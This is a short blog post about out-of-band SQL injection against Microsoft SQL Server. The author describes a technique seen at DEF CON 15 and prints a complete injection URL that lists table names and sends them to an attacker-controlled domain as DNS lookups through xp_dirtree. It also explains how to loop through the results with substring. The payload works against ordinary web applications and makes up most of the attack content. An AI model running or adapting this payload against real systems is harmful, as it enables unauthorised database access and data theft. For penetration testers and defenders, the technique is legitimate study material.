SQL Injection And OOB

October 25, 2007

I attended this talk in defcon 15. So, if you have identified a SQL injection and outbound connections are not blocked for udp port 53, than this probably is the best way to get data out of database Server. The most beautiful part of this attack is, you can get data from database server in form of dns requests, even without being 'sa' or 'dbo'. Things you will need:-

Access to Tcpdump running on a public ip address.

Here are a few examples:-

http://victim/exp.asp?name=blah';BEGIN DECLARE @r varchar(8000) SET @r=':' SELECT @r=@r+'.'+name FROM sysobjects WHERE xtype='U' AND name>@r end;DECLARE @x as varchar(8000);SET @x=''+SUBSTRING(@r,1,200)+'.mywebsitex';EXEC master..xp_DIRTREE @x–

This will give you the first 200 chars of the output of  (SELECT name FROM sysobjects WHERE xtype='U')

by iterating through the substring() function you can then get all table names within 3-4 requests. 

How would you compare this with waitfor delay attack techniques.

Credits:-Pentestmonkey, ferruh 


Leave a Reply

Your email address will not be published. Required fields are marked *